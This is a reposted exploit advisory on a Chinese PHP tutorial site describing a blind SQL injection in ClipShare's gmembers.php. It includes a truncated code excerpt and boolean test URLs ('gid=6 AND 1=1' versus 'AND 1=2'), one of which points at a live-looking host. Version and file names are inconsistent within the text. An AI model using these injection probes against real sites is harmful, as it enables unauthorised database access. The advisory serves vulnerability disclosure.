来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 标题: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability 作者: Esac 影响程序: ClipShare - Video Sharing Community Script 4.1.4 官网: http://www.clip-share.com 任意......
|
标题: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
作者: Esac
影响程序: ClipShare - Video Sharing Community Script 4.1.4
官网: http://www.clip-share.com
任意版本受影响
注意 : this vulnerable work just if there is a group added to the community
#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
===============================
#缺陷脚本
PHP script : members.php on line 23
============ BEGIN OF gmembers.php =======
execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$urlkey = $rs->fields['gurl'];
$gname = $rs->fields['gname'];
$gupload = $rs->fields['gupload'];
$oid = $rs->fields['OID'];
STemplate::assign('gname', $gname);
STemplate::assign('gurl', $urlkey);
STemplate::assign('gupload', $gupload);
} else {
session_write_close();
header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
die();
}
...........................................;
...............................................
?>
===================================================================================
Poc :
http://www.2cto.com /mavideo/gmembers.php?gid=6 [Blind SQLi]
Real exploitation :
http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> return normal page
http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> return page with some errors ( or with nothing - white page )
--------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : White Tarbouch Team
./Esac
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
